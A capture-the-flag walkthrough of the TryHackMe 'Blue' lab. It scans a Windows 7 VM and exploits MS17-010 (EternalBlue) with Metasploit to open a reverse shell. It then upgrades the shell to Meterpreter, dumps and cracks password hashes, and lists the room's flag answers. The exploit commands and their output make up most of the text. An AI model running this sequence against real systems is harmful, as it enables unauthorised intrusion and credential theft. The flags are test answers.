Recon
Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.
The virtual machine used in this room (Blue) can be downloaded for offline usage from https://darkstar7471.com/resources.html[](https://darkstar7471.com/resources.html)
_Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter._
Answer the questions
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the [Nmap](https://tryhackme.com/room/furthernmap) room)
nmap -sV -sC --script vuln -oN blue.nmap 10.10.143.88
# Nmap 7.80 scan initiated Tue Oct 21 13:16:46 2025 as: nmap -sV -sC --script vuln -oN blue.nmap 10.10.143.88
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.143.88
Host is up (0.00062s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:D7:4D:B1:AF:7D (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 21 13:19:04 2025 -- 1 IP address (1 host up) scanned in 138.25 seconds
How many ports are open with a port number under 1000?
Answer: 3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Answer: ms17-010
Gain Access
Exploit the machine and gain a foothold.
Answer the questions
Start [Metasploit](https://tryhackme.com/module/metasploit)
msfconsole
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
msf6 > search type:exploit windows 7 name:ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
Interact with a module by name or index. For example info 18, use 18 or use exploit/windows/smb/ms17_010_psexec
msf6 >
Answer: exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.215.60 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.143.88
RHOSTS => 10.10.143.88
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Answer RHOSTS
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
With that done, run the exploit!
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.215.60:4444
[*] 10.10.143.88:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.143.88:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.143.88:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.143.88:445 - The target is vulnerable.
[*] 10.10.143.88:445 - Connecting to target for exploitation.
[+] 10.10.143.88:445 - Connection established for exploitation.
[+] 10.10.143.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.143.88:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.143.88:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.143.88:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.143.88:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.143.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.143.88:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.143.88:445 - Sending all but last fragment of exploit packet
[*] 10.10.143.88:445 - Starting non-paged pool grooming
[+] 10.10.143.88:445 - Sending SMBv2 buffers
[+] 10.10.143.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.143.88:445 - Sending final SMBv2 buffers.
[*] 10.10.143.88:445 - Sending last fragment of exploit packet!
[*] 10.10.143.88:445 - Receiving response from exploit packet
[+] 10.10.143.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.143.88:445 - Sending egg to corrupted connection.
[*] 10.10.143.88:445 - Triggering free of corrupted buffer.
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.143.88:445 - Connecting to target for exploitation.
[+] 10.10.143.88:445 - Connection established for exploitation.
[+] 10.10.143.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.143.88:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.143.88:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.143.88:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.143.88:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.143.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.143.88:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.143.88:445 - Sending all but last fragment of exploit packet
[*] 10.10.143.88:445 - Starting non-paged pool grooming
[+] 10.10.143.88:445 - Sending SMBv2 buffers
[+] 10.10.143.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.143.88:445 - Sending final SMBv2 buffers.
[*] 10.10.143.88:445 - Sending last fragment of exploit packet!
[*] 10.10.143.88:445 - Receiving response from exploit packet
[+] 10.10.143.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.143.88:445 - Sending egg to corrupted connection.
[*] 10.10.143.88:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.143.88
[*] Command shell session 1 opened (10.10.215.60:4444 -> 10.10.143.88:49191) at 2025-10-21 13:30:35 +0100
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.143.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
Escalate
Escalate privileges, learn how to upgrade shells in metasploit.
Answer the questions
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
C:\Windows\system32>background
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) > search type:post name:shell_to_meterpreter
[-] No results from search
msf6 exploit(windows/smb/ms17_010_eternalblue) > search type:post shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter . normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Answer: post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(multi/manage/shell_to_meterpreter) >
Answer SESSION
Set the required option, you may need to list all of the sessions to find your target here.
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.10.215.60:4444 -> 10.10.143.88:49191 (10.10.143.88)
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) >
Run! If this doesn't work, try completing the exploit from the previous task once more.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.215.60:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (203846 bytes) to 10.10.143.88
[*] Meterpreter session 2 opened (10.10.215.60:4433 -> 10.10.143.88:49192) at 2025-10-21 13:38:53 +0100
[*] Stopping exploit/multi/handler
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.10.215.60:4444 -> 10.10.143.88:49191 (10.10.143.88)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.215.60:4433 -> 10.10.143.88:49192 (10.10.143.88)
Once the meterpreter shell conversion completes, select that session for use.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 696 svchost.exe x64 0 NT AUTHORITY\SYSTEM
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
488 696 svchost.exe x64 0 NT AUTHORITY\SYSTEM
540 820 WmiPrvSE.exe
548 540 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
600 540 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
608 588 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
648 588 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
696 600 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
704 600 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
712 600 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
820 696 svchost.exe x64 0 NT AUTHORITY\SYSTEM
888 696 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
936 696 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1004 648 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
1044 696 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1164 696 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1288 696 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1324 696 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1392 696 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1464 696 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAgent.exe
1596 696 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1860 1288 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
1944 696 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2008 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2040 696 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM
2268 1584 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2348 696 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2484 696 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2488 696 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2532 696 vds.exe x64 0 NT AUTHORITY\SYSTEM
2556 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2708 696 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
2848 2352 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2880 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
3012 1596 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
3020 548 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
meterpreter >
Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
meterpreter > migrate 1288
[*] Migrating from 2848 to 1288...
[*] Migration completed successfully.
meterpreter >
Cracking
Dump the non-default user's password and crack it!
Answer the questions
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
Answer: Jon
Copy this password hash to a file and research how to crack it. What is the cracked password?
https://hashes.com/en/decrypt/hash
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22
Answer: alqfna22
Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they're meant to represent key locations within the Windows system.
Answer the questions
Flag1? _This flag can be found at the system root._
meterpreter > search -fi *Flag1*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk 482 2019-03-17 19:26:42 +0000
c:\flag1.txt 24 2019-03-17 19:27:21 +0000
meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter >
Answer: flag{access_the_machine}
Flag2? _This flag can be found at the location where passwords are stored within Windows._
*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
meterpreter > search -fi *flag2*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk 848 2019-03-17 19:30:04 +0000
c:\Windows\System32\config\flag2.txt 34 2019-03-17 19:32:48 +0000
meterpreter > cat C:/Windows/system32/config/flag2.txt
flag{sam_database_elevated_access}
Answer: flag{sam_database_elevated_access}
flag3? _This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved._
meterpreter > search -fi *flag3*
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk 2344 2019-03-17 19:32:52 +0000
c:\Users\Jon\Documents\flag3.txt 37 2019-03-17 19:26:36 +0000
meterpreter > cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}
Answer: flag{admin_documents_can_be_valuable}